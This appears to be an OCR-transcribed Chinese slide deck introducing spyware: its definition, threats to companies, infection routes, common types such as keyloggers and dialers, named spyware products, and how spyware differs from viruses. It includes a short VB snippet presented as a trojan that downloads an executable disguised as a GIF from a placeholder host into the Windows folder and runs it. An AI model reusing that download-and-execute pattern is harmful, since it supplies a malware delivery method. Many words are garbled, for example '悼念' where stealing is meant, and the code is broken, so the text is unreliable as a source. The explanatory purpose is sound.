定义,在未得到用户同意前提下,一个自动下载并执行的程序,该程序秘密悼念用户信息并发送给相关第三方.
威胁一揽:
任何站点可藏匿有间谍软件;
打开垃圾邮件,间谍软件被推送到您机器;
泄漏机密信息;
消耗企业带宽资源;
降低企业机器速度;
企业网络留下后门.

软件很小....却很难清除
Function (dowplozd() As Boolean
Open"c:\\Windows\wmclaver. exe"For Binary Access White As #1
Put #1.Inet Obj.Open URL(HTTP://Spvware.com/SpywareExe.GIf.ic ByteArray)
Close#1
Shell"c:\\Windows\wmdlaver.exe"
End Function
这是一个VB木马,仅有四行代码-以可执行文件方式下载(作为GIF文件),并执行该文件;
每一个间谍软件的下载都可以时实编辑每一个下载都有一个唯一签名;
典型的间谍软件安装包含20-30个木马-互相通知/更新;
传统病毒软件特征码的检查成功率仅50%-间谍软件都独一无二,遥遥领先于特征码开发者.

间谍软件感染方式
"背上"安装方式::在安装免费软件如屏保程序,文件共享程序等自动安装;
"推送下载":通过文章网站,或者通过浏览器阅读电子工业邮件下载;
浏览器漏洞::一个下载工具在下载后,可以下载大量间谍软件;
广告软件:发布广告信息,监控及汇报用户行为.

五种常见类型的间谍软件
-系统监控(System Monitor): 如:键盘日志(Keyboard logger/trackware)捕捉键盘录入(个人信息,密码,文章的网站等)
-木马(Trojan):使你的机器远程被黑客控制,经常是为拒绝服务攻击(DOS);
蒜靶软件(DRONEWARE):面向宿主在量发送垃圾邮件,或者戟性网站资料;
拔号软件(Dialer):自动拔号的程序;
广告软件(Adware):自动弹出广告窗口,推送广告信息.

几种间谍软件潦倒
PurityScan----显示弹出广告,宣称能够卸用户电脑上的色情图片;
Transponder(vx2)----"IE浏览器助手2",监控网页浏览,发送有关广告;
KeenValue----广告软件,搜集私人信息,向用户发送广告;
Perfect Keylogger----监控上具,记录网页浏览历史,键盘招标按键记录,登陆密码帐号等私人信息.

间谍软件窃取的资料
1,企业的种类机密信息:客户信息,员工薪酬资料,企业财务档案,企业软件源码,机密交易资料;
2,政府的种类机密信息:政府红头文件,会议机要,国家重要经济数据等;
3,金融机构的种类机密信息:大量储户保密信息,重要的金融数据,重要的协议往来文件,种类公司户头信息等;
个人信息:个人的密码,身份信息重要资料,网上浏览习惯等.

--通过行为区别:病毒的行为在于传播/间谍软件行为在于寄生-病毒软件目的在于感染电脑,进行自我复制,在最短时间内感染最多电脑;
-间谍软件需伪装成合法软件,寄生在DLL或registry中,可以秘密地发信你的信息;
--通过目的区别:病毒的目的名声/间谍软件在于获利-病毒的作者多是为了恶作剧或者是自我显示及自我实现;
间谍软件的目的是寄生在你的电脑上,用于商业获利的目的;
--通过恶意程度区别:病毒需要破坏/间谍软件需要安全稳定
-病毒是有意要起到破坏作用的,如删除系统资料,破坏文件结构,发动DDOS攻击等;
-间谍软件的目的在于获利,所以需要它的寄生方"身体健康"所以它们通常是不不破坏的.